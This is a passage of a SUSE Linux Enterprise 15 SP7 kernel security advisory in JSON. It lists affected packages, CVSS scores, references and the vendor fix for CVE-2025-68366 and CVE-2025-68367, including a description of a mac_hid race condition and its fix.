"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
